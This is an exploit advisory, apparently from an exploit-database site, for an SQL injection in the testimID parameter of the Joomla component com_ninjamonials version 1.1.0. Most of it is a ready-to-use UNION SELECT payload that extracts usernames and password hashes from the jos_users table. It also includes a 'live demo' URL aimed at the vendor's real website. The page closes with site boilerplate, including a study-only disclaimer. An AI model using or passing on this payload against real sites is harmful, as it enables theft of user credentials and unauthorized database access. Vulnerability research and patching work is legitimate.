---------------------------------------------------------------------- Joomla Component com_ninjamonial (testimID) SQL injection Vulnerability ---------------------------------------------------------------------- ################################################### [+] Author : Chip D3 Bi0s [+] Email : chipdebios[alt+64]gmail.com [+] Group : LatinHackTeam [+] Vulnerability : SQL injection ################################################### Information: Name : NinjaMonials - Testimonials Manager. Version : 1.1.0 Date : Jan 2009 Licence : GPL Type : Commercial Compatibility : 1.0 Native web : http://www.ninjaforge.com more info & demo : http://ninjaforge.com/index.php?option=com_ninjacentral&page=show_package&id=56&Itemid=245 -------------------------------------------------------------------- Example: http://localhost/path/index.php?option=com_ninjamonials&task=display&testimID=n<sql Code> n: Valid testimID <Sql Code>: +and+1=2+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8+from+jos_users Demo Live: http://www.ninjaforge.com/index.php?option=com_ninjamonials&task=display&testimID=3+and+1=2+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8+from+jos_users +++++++++++++++++++++++++++++++++ [!] Produced in South America --------------------------------- # sebug.net
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论